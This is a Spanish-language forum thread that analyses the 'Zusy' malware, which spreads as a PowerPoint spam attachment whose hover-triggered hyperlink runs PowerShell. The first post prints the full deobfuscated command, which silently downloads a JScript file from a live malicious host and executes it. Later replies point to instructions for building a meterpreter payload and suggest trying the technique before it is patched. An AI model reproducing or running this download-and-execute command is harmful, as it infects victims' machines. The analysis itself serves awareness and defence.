Otra modalidad malware para conocer de PowerPoint

Iniciado por xhc1, Junio 09, 2017, 11:38:00 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 09, 2017, 11:38:00 AM Ultima modificación: Junio 09, 2017, 01:47:52 PM por Gabriela

A diferencia de otros archivos de Microsoft Office que contienen macros maliciosas, el documento que ha sido descubierto utiliza comandos PowerShell, y simplemente con pasar por encima el ratón de un enlace (mouse hover) se activa la secuencia del payload.


Una nueva variante de un malware llamado "Zusy" se ha encontrado en la propagación como un archivo de PowerPoint adjunto a correos electrónicos de spam con títulos como "Orden de Compra # 130527" y "Confirmación". Es interesante porque no requiere que el usuario habilite las macros para ejecutarse.




La mayoría del malware de Office se basa en que los usuarios activan las macros para descargar alguna carga útil ejecutable que hace la mayoría de las cosas maliciosas, pero este malware utiliza la función del programa externo en su lugar.

Este ataque explota una característica legítima de PowerPoint. Colocar el cursor sobre un hipervínculo en una presentación puede desencadenar macros, llevar al usuario a la siguiente diapositiva, reproducir un sonido, abrir una página web o abrir una aplicación externa. La mayoría de los ataques malware basados en documentos a través de PowerPoint usarían macros para descargar la carga maliciosa, pero ahora que Office bloquea macros por defecto y más usuarios saben que no las habilitan, los atacantes están buscando otras formas de engañar a los usuarios.

Cuando se abre el archivo malicioso de PowerPoint, muestra una pantalla con un solo enlace que dice "Cargando ... espere":

En caso de que la víctima pase el cursor del ratón por encima de este link se ejecutará un código malicioso que intentará conectarse a una página web para descargar malware en el ordenador. Por tanto, ni siquiera es necesario hacer clic en el enlace, un detalle que ha llamado la atención de los investigadores de seguridad.



    <a:hlinkMouseOver r:id="rId2" action="No tienes permitido ver los links. Registrarse o Entrar a mi cuenta>


En efecto se puede ejecutar un comando al pasar por encima de un enlace en un PowerPoint:

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


    ppaction://protocol 


Para usuarios con vista protegida deshabilitada o cuando los usuarios ignoran la ventana emergente y permiten que el código se ejecute, el código malicioso de PowerShell intentará conectarse a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y descargar otro archivo.

Y el comando desofuscado en PowerShell hace que visite la URL maligna (hxxp) que descarga un fichero .JSE
Esto indica que es un archivo JScript Encoded codificado que es ejecutado por WScript para descagar un fichero EXE

    powershell -NoP -NonI -W Hidden -Exec Bypass

     "IEX (New-Object System.Net.WebClient).

    DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\");

     Invoke-Item \"$env:temp\ii.jse\""


Si el usuario tiene habilitada la función Vista protegida, que de acuerdo con Microsoft está activada por defecto tanto en Windows Defender como en Office 365, PowerPoint detendrá el ataque y mostrará un aviso de seguridad.

Algunos análisis completos y muestras del malware en inglés:

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Algunos expertos de seguridad aseguran que PowerPoint Viewer, al no ser compatible con la ejecución de programas externos, no está afectado por este fallo.

Fuentes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Junio 17, 2017, 10:49:35 PM #1 Ultima modificación: Julio 20, 2017, 06:31:53 PM por xyz
Hoy salió un post en el blog de chema, donde explica tambien todos los pasos para crear meterpreter con la maquina;


Lo dejo como anexo al post :D

Fuente:
Código: php
http://www.elladodelmal.com/2017/06/zusy-como-un-powerpoint-entrega-tu.html

Hola, está  muy bueno  toca probar antes de que lo parchen